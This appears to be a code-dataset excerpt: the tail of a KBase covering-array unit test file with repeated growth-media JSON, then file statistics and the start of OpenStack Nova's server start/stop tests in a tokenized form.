{"compound_ref":"kbase/default/compounds/id/cpd10515","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd11574",
"concentration":0.001,"maxFlux":100,"minFlux":-100}],"name":"7H9","source_id":"7H9","type":"unspecified"}
#weka has the object saved in the setupclass method
mediaObject = self.getWsClient().save_objects({'workspace': self.getWsName(),'objects': [{'name':'Mediain',
'type':'KBaseBiochem.Media',
'data':testMedia }]
})[0]
# Prepare test objects in workspace if needed using
#
# Run your method by
# ret = self.getImpl().your_method(self.getContext(), parameters...)
#
# Check returned data with
# self.assertEqual(ret[...], ...) or other unittest methods
ret = self.serviceImpl.run_Coveringarray(self.ctx, {'workspace_name': self.wsName,'option_0':"2",
'container_object': [{"option_1":"Firefox", "option_2":["on","off"]},
{"option_1":"Network", "option_2":["on","off"]},
{"option_1":"Feature", "option_2":["ready","unready","unsure"]},{"option_1":"os", "option_2":["low","medium","high","very high"]}
],
'input_media':'','evaluation_options':'',
'output_media':'matrixout',
'output_json_check':1,
'output_media_check':0})
arrayValid = int(subprocess.check_output(['/kb/module/./checkpairs','/kb/module/anneal.out']))
self.assertEqual(arrayValid,0,"Produced incorrect coverage array")
def testMediaInput(self):
testMedia = {"__VERSION__":1,"id":"kb|media.664","isDefined":0,"isMinimal":0,"mediacompounds":[{"compound_ref":"kbase/default/compounds/id/cpd00205",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00242","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00048","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00009",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00007","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00013","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00971",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00067","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00001","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00036",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00100","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00023","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00027",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd10516","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00058","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00099",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00137","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00063","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00254",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00030","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00034","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00149",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00244","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd10515","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd11574",
"concentration":0.001,"maxFlux":100,"minFlux":-100}],"name":"7H9","source_id":"7H9","type":"unspecified"}
#weka has the object saved in the setupclass method
mediaObject = self.getWsClient().save_objects({'workspace': self.getWsName(),'objects': [{'name':'Mediain',
'type':'KBaseBiochem.Media',
'data':testMedia }]
})[0]
ret = self.serviceImpl.run_Coveringarray(self.ctx, {'workspace_name': self.wsName, 'container_object':[{'option_1':'appendedmedia','option_2':['apoption1','apoption2']}],
'option_0':"2",'input_media':mediaObject[0],'evaluation_options':'append_media','output_media':'matrixout',
'output_json_check':1,
'output_media_check':0})
arrayValid = int(subprocess.check_output(['/kb/module/./checkpairs','/kb/module/anneal.out']))
self.assertEqual(arrayValid,0,"Produced incorrect coverage array")
#identify consistent member of tool output that indicates success
#self.assertEqual(ret, "OK")
def testManualandMediaInputExclusive(self):
testMedia = {"__VERSION__":1,"id":"kb|media.664","isDefined":0,"isMinimal":0,"mediacompounds":[{"compound_ref":"kbase/default/compounds/id/cpd00205",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00242","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00048","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00009",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00007","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00013","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00971",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00067","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00001","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00036",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00100","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00023","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00027",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd10516","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00058","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00099",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00137","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00063","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00254",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00030","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00034","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00149",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00244","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd10515","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd11574",
"concentration":0.001,"maxFlux":100,"minFlux":-100}],"name":"7H9","source_id":"7H9","type":"unspecified"}
#weka has the object saved in the setupclass method
mediaObject = self.getWsClient().save_objects({'workspace': self.getWsName(),'objects': [{'name':'Mediain',
'type':'KBaseBiochem.Media',
'data':testMedia }]
})[0]
ret = self.serviceImpl.run_Coveringarray(self.ctx, {'workspace_name': self.wsName,'option_0':"2",
'container_object': [{"option_1":"cpd00007", "option_2":["100","0"]},
{"option_1":"cpd00009", "option_2":["100","0"],'output_media':'matrixout'}
],
'input_media':mediaObject[0],'evaluation_options':'isolate_media','output_media':'matrixout',
'output_json_check':1,
'output_media_check':1})
arrayValid = int(subprocess.check_output(['/kb/module/./checkpairs','/kb/module/anneal.out']))
self.assertEqual(arrayValid,0,"Produced incorrect coverage array")
def testManualandMediaInputInclusive(self):
testMedia = {"__VERSION__":1,"id":"kb|media.664","isDefined":0,"isMinimal":0,"mediacompounds":[{"compound_ref":"kbase/default/compounds/id/cpd00205",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00242","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00048","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00009",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00007","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00013","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00971",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00067","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00001","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00036",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00100","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00023","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00027",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd10516","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00058","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00099",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00137","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00063","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00254",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00030","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00034","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00149",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00244","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd10515","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd11574",
"concentration":0.001,"maxFlux":100,"minFlux":-100}],"name":"7H9","source_id":"7H9","type":"unspecified"}
#weka has the object saved in the setupclass method
mediaObject = self.getWsClient().save_objects({'workspace': self.getWsName(),'objects': [{'name':'Mediain',
'type':'KBaseBiochem.Media',
'data':testMedia }]
})[0]
ret = self.serviceImpl.run_Coveringarray(self.ctx, {'workspace_name': self.wsName,'option_0':"2",
'container_object': [{"option_1":"cpd00009", "option_2":["90","80"]},
{"option_1":"cpd00007", "option_2":["70","60"],'output_media':'matrixout'}
],
'input_media':mediaObject[0], 'evaluation_options':'overwrite_media','output_media':'mediaout',
'output_media_check':1,
'output_json_check':1})
arrayValid = int(subprocess.check_output(['/kb/module/./checkpairs','/kb/module/anneal.out']))
self.assertEqual(arrayValid,0,"Produced incorrect coverage array")
#self.assertEqual(ret, "OK")
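# --- Added helper sketch (illustrative only; not part of the original tests) ---
# Each test above repeats the same external validation: run the bundled checkpairs
# binary against anneal.out and assert a zero exit value. The helper below captures
# that pattern once; the binary and output paths are copied from the calls above,
# and the helper name itself is an assumed example.
def _coverage_array_is_valid(checker='/kb/module/./checkpairs', annealed='/kb/module/anneal.out'):
    return int(subprocess.check_output([checker, annealed])) == 0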
| 88.589744 | 193 | 0.614568 | 2,221 | 20,730 | 5.622692 | 0.10896 | 0.088085 | 0.128123 | 0.184177 | 0.825432 | 0.816144 | 0.805653 | 0.805653 | 0.805653 | 0.796204 | 0 | 0.098923 | 0.202701 | 20,730 | 233 | 194 | 88.969957 | 0.656643 | 0.03864 | 0 | 0.6 | 0 | 0 | 0.474707 | 0.186316 | 0 | 0 | 0 | 0 | 0.021622 | 1 | 0.054054 | false | 0 | 0.048649 | 0.016216 | 0.135135 | 0.005405 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ff3afed53bb7d3063c02272328b7de9d9b95b4f6 | 16,344 | py | Python | nova/tests/unit/api/openstack/compute/test_server_start_stop.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/api/openstack/compute/test_server_start_stop.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/api/openstack/compute/test_server_start_stop.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | 2 | 2017-07-20T17:31:34.000Z | 2020-07-24T02:42:19.000Z | begin_unit
comment|'# Copyright (c) 2012 Midokura Japan K.K.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'from'
name|'mox3'
name|'import'
name|'mox'
newline|'\n'
name|'import'
name|'six'
newline|'\n'
name|'import'
name|'webob'
newline|'\n'
nl|'\n'
name|'from'
name|'oslo_policy'
name|'import'
name|'policy'
name|'as'
name|'oslo_policy'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
op|'.'
name|'api'
op|'.'
name|'openstack'
op|'.'
name|'compute'
name|'import'
name|'extension_info'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'api'
op|'.'
name|'openstack'
op|'.'
name|'compute'
name|'import'
name|'servers'
name|'as'
name|'server_v21'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'compute'
name|'import'
name|'api'
name|'as'
name|'compute_api'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'exception'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'policy'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'api'
op|'.'
name|'openstack'
name|'import'
name|'fakes'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
name|'import'
name|'uuidsentinel'
name|'as'
name|'uuids'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|function|fake_instance_get
name|'def'
name|'fake_instance_get'
op|'('
name|'context'
op|','
name|'instance_id'
op|','
nl|'\n'
name|'columns_to_join'
op|'='
name|'None'
op|','
name|'use_slave'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'result'
op|'='
name|'fakes'
op|'.'
name|'stub_instance'
op|'('
name|'id'
op|'='
number|'1'
op|','
name|'uuid'
op|'='
name|'instance_id'
op|')'
newline|'\n'
name|'result'
op|'['
string|"'created_at'"
op|']'
op|'='
name|'None'
newline|'\n'
name|'result'
op|'['
string|"'deleted_at'"
op|']'
op|'='
name|'None'
newline|'\n'
name|'result'
op|'['
string|"'updated_at'"
op|']'
op|'='
name|'None'
newline|'\n'
name|'result'
op|'['
string|"'deleted'"
op|']'
op|'='
number|'0'
newline|'\n'
name|'result'
op|'['
string|"'info_cache'"
op|']'
op|'='
op|'{'
string|"'network_info'"
op|':'
string|"'[]'"
op|','
nl|'\n'
string|"'instance_uuid'"
op|':'
name|'result'
op|'['
string|"'uuid'"
op|']'
op|'}'
newline|'\n'
name|'return'
name|'result'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|function|fake_start_stop_not_ready
dedent|''
name|'def'
name|'fake_start_stop_not_ready'
op|'('
name|'self'
op|','
name|'context'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceNotReady'
op|'('
name|'instance_id'
op|'='
name|'instance'
op|'['
string|'"uuid"'
op|']'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|function|fake_start_stop_locked_server
dedent|''
name|'def'
name|'fake_start_stop_locked_server'
op|'('
name|'self'
op|','
name|'context'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceIsLocked'
op|'('
name|'instance_uuid'
op|'='
name|'instance'
op|'['
string|"'uuid'"
op|']'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|function|fake_start_stop_invalid_state
dedent|''
name|'def'
name|'fake_start_stop_invalid_state'
op|'('
name|'self'
op|','
name|'context'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceIsLocked'
op|'('
name|'instance_uuid'
op|'='
name|'instance'
op|'['
string|"'uuid'"
op|']'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|ServerStartStopTestV21
dedent|''
name|'class'
name|'ServerStartStopTestV21'
op|'('
name|'test'
op|'.'
name|'TestCase'
op|')'
op|':'
newline|'\n'
DECL|variable|start_policy
indent|' '
name|'start_policy'
op|'='
string|'"os_compute_api:servers:start"'
newline|'\n'
DECL|variable|stop_policy
name|'stop_policy'
op|'='
string|'"os_compute_api:servers:stop"'
newline|'\n'
nl|'\n'
DECL|member|setUp
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'ServerStartStopTestV21'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_setup_controller'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'req'
op|'='
name|'fakes'
op|'.'
name|'HTTPRequest'
op|'.'
name|'blank'
op|'('
string|"''"
op|')'
newline|'\n'
nl|'\n'
DECL|member|_setup_controller
dedent|''
name|'def'
name|'_setup_controller'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ext_info'
op|'='
name|'extension_info'
op|'.'
name|'LoadedExtensionInfo'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'='
name|'server_v21'
op|'.'
name|'ServersController'
op|'('
nl|'\n'
name|'extension_info'
op|'='
name|'ext_info'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_start
dedent|''
name|'def'
name|'test_start'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'start'"
op|')'
newline|'\n'
name|'compute_api'
op|'.'
name|'API'
op|'.'
name|'start'
op|'('
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'start'
op|'='
string|'""'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_start_server'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_start_policy_failed
dedent|''
name|'def'
name|'test_start_policy_failed'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'rules'
op|'='
op|'{'
nl|'\n'
name|'self'
op|'.'
name|'start_policy'
op|':'
string|'"project_id:non_fake"'
nl|'\n'
op|'}'
newline|'\n'
name|'policy'
op|'.'
name|'set_rules'
op|'('
name|'oslo_policy'
op|'.'
name|'Rules'
op|'.'
name|'from_dict'
op|'('
name|'rules'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'start'
op|'='
string|'""'
op|')'
newline|'\n'
name|'exc'
op|'='
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'PolicyNotAuthorized'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_start_server'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
name|'self'
op|'.'
name|'start_policy'
op|','
name|'exc'
op|'.'
name|'format_message'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_start_not_ready
dedent|''
name|'def'
name|'test_start_not_ready'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'start'"
op|','
name|'fake_start_stop_not_ready'
op|')'
newline|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'start'
op|'='
string|'""'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_start_server'
op|','
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_start_locked_server
dedent|''
name|'def'
name|'test_start_locked_server'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'start'"
op|','
name|'fake_start_stop_locked_server'
op|')'
newline|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'start'
op|'='
string|'""'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_start_server'
op|','
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_start_invalid_state
dedent|''
name|'def'
name|'test_start_invalid_state'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'start'"
op|','
name|'fake_start_stop_invalid_state'
op|')'
newline|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'start'
op|'='
string|'""'
op|')'
newline|'\n'
name|'ex'
op|'='
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_start_server'
op|','
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'is locked'"
op|','
name|'six'
op|'.'
name|'text_type'
op|'('
name|'ex'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_stop
dedent|''
name|'def'
name|'test_stop'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'stop'"
op|')'
newline|'\n'
name|'compute_api'
op|'.'
name|'API'
op|'.'
name|'stop'
op|'('
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'stop'
op|'='
string|'""'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_stop_server'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_stop_policy_failed
dedent|''
name|'def'
name|'test_stop_policy_failed'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'rules'
op|'='
op|'{'
nl|'\n'
name|'self'
op|'.'
name|'stop_policy'
op|':'
string|'"project_id:non_fake"'
nl|'\n'
op|'}'
newline|'\n'
name|'policy'
op|'.'
name|'set_rules'
op|'('
name|'oslo_policy'
op|'.'
name|'Rules'
op|'.'
name|'from_dict'
op|'('
name|'rules'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'stop'
op|'='
string|'""'
op|')'
newline|'\n'
name|'exc'
op|'='
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'PolicyNotAuthorized'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_stop_server'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
name|'self'
op|'.'
name|'stop_policy'
op|','
name|'exc'
op|'.'
name|'format_message'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_stop_not_ready
dedent|''
name|'def'
name|'test_stop_not_ready'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'stop'"
op|','
name|'fake_start_stop_not_ready'
op|')'
newline|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'stop'
op|'='
string|'""'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_stop_server'
op|','
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_stop_locked_server
dedent|''
name|'def'
name|'test_stop_locked_server'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'stop'"
op|','
name|'fake_start_stop_locked_server'
op|')'
newline|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'stop'
op|'='
string|'""'
op|')'
newline|'\n'
name|'ex'
op|'='
name|'self'
op|'.'
